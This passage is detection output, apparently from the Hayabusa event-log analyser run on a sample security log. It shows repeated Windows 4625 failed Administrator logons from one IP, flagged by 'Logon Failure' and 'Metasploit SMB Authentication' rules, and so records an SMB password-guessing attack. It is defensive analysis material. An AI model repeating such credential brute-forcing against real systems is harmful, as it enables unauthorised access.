Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7rkiDUBuTCU2jDXR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jjsCFTQoobrkQoWF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dNXav95nZyBhVOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yeq1x56Ct6R2Nu3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pUwyCNtwydEQu2bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bX7eihAOk3PUgbwM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WPXqAsaYaXEr8I9L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4SaEmIpmlH1VMDun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3Dvp43a2h7Mzx2H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g3voKlRXc7rIaIYs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GF1Q5OhCLRAi96mN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: caHe4iY2CQoiumQI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJi6UAm6Pp6eax8Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EW0t2wapD8yniO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PnaITXTihpB0stwx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tdBVoa82WKEAW2ce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BelKzJrEjGIcU2dN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ujeb7fRHPGCGmFm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Czwt7KF2sQHemwdJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LQQ4nNpbfKKVCJZH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6jwIc6e0AHAhXKK5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nld9Job0Ll1Fgtmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9sS6i9iU3PXhokz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: heaYv6Np8swhoVc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7rzgNBtUJkS93pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh45suNQ09FzPBjd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BOnwAGxxz994k6Ee : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L26mvUKOgGptcKaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aqldRjcLl8KFZr5h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ycNPBtmRHShPOcRA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ISlMGsVvXry0rbju : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MjGjh70EQ5YVGJUt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yaYM5N2kuvuRCHRU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 32wgj2t7BLBviVxd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vr1kMRxLEaCIWIbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4PHEJyKgp5wXRtBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbaoz8rTZVXUjRAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d4eD3JQ5gquIqgND : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9slFFSSXhFxPqG1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDb5Up4KwJj0hN5n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxqIpDLlnf6Xyc34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTCTTYmKTIzzJwxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oD3dLxlB3qWIhZEQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fe9xMOoCxPJIIyVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DW3YgBZYiGTeEw66 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VAKeeIcOeiQ3H9NF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nmF3ot3gJCsBlSwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 